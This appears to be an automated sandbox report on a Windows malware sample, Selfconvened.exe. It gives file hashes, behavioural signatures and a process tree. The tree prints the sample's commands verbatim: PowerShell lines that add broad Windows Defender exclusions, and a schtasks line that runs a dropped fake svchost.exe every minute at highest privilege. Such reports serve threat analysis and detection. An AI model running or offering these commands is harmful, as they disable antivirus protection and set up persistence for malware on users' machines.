Analysis
-
max time kernel
116s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
23-11-2024 10:59
Static task
static1
Behavioral task
behavioral1
Sample
b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$TEMP/K3M6Ljh9fd22.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$TEMP/K3M6Ljh9fd22.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$TEMP/Selfconvened.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
$TEMP/Selfconvened.exe
Resource
win10v2004-20241007-en
General
-
Target
$TEMP/Selfconvened.exe
-
Size
4.5MB
-
MD5
64b5e984fda860eedf19c29a124094fb
-
SHA1
760c195741989e17b48ad52c13bed35e8ea51692
-
SHA256
1f47c67d3baa635c4b7dd2bfed0a26a6bd499c3ab5a64d10b391a52e7d71ba39
-
SHA512
187dbbc7137db41da77dd5c3d1471f82b157d031653109632adb9c49ea519f452b661cfd1845512661dcdb3b00bf2a02b2c3504406fb19ad89b06fcd6afee4e4
-
SSDEEP
98304:xLIWL25lsofrCgl5PmHGjCYv8LHPrVWPa5Qwy:Fslsofuit0bJWPa5QJ
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1020 powershell.exe 3040 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 592 svchost.exe 1968 svchost.exe -
Loads dropped DLL 1 IoCs
pid Process 2364 taskeng.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\WindowsPro\svchost.exe Selfconvened.exe File opened for modification C:\Windows\system32\WindowsPro\svchost.exe Selfconvened.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2576 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1492 Selfconvened.exe 1020 powershell.exe 3040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1492 Selfconvened.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 3040 powershell.exe Token: SeDebugPrivilege 592 svchost.exe Token: SeDebugPrivilege 1968 svchost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1492 wrote to memory of 2628 1492 Selfconvened.exe 30 PID 1492 wrote to memory of 2628 1492 Selfconvened.exe 30 PID 1492 wrote to memory of 2628 1492 Selfconvened.exe 30 PID 1492 wrote to memory of 2576 1492 Selfconvened.exe 31 PID 1492 wrote to memory of 2576 1492 Selfconvened.exe 31 PID 1492 wrote to memory of 2576 1492 Selfconvened.exe 31 PID 2628 wrote to memory of 1020 2628 cmd.exe 34 PID 2628 wrote to memory of 1020 2628 cmd.exe 34 PID 2628 wrote to memory of 1020 2628 cmd.exe 34 PID 2628 wrote to memory of 3040 2628 cmd.exe 36 PID 2628 wrote to memory of 3040 2628 cmd.exe 36 PID 2628 wrote to memory of 3040 2628 cmd.exe 36 PID 2364 wrote to memory of 592 2364 taskeng.exe 37 PID 2364 wrote to memory of 592 2364 taskeng.exe 37 PID 2364 wrote to memory of 592 2364 taskeng.exe 37 PID 2364 wrote to memory of 1968 2364 taskeng.exe 38 PID 2364 wrote to memory of 1968 2364 taskeng.exe 38 PID 2364 wrote to memory of 1968 2364 taskeng.exe 38 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe"C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\system32\cmd.exe"cmd" #cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /f /sc minute /rl highest /mo 1 /tn "Bobsledding" /tr "C:\Windows\system32\WindowsPro\svchost.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2576
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {CD7822F0-546D-4EA6-86BB-A000AA201D25} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\WindowsPro\svchost.exeC:\Windows\system32\WindowsPro\svchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:592
-
-
C:\Windows\system32\WindowsPro\svchost.exeC:\Windows\system32\WindowsPro\svchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f2002f64302f47f4b5077d443d8bf1e9
SHA1f3d21fcdf004375fc1db6dea57dc578ede1681c7
SHA2569f72b7de74ada5fc628fb5f8d4ef9f7cb4e13894551df76260c531ccb9fb9bc8
SHA512099bff18e3923cdbb104270718984e75fecb2e1de6ab788411964a6da6db35552f69ffc34b09c258698e9ac6dc47d14997b9e4b94bc093f7251b81c44f0ca668
-
Filesize
10.6MB
MD5d4e78894075f6d33163a09495bef6a06
SHA1644388ba80132608f1f8b28108e9e846d72fb445
SHA2565cebd33c6f5dee6bba0517ef6c93892516229dd7ebff524ed49551b26b9cf573
SHA512acdbe4da39e41302c4927f9a7ad0ed6ab736290eb1696214f3fff0cbc09625a015f2e236e538d2c826cd9d0af57969d1f860ef91e65c4a55cd884dfd39d275ee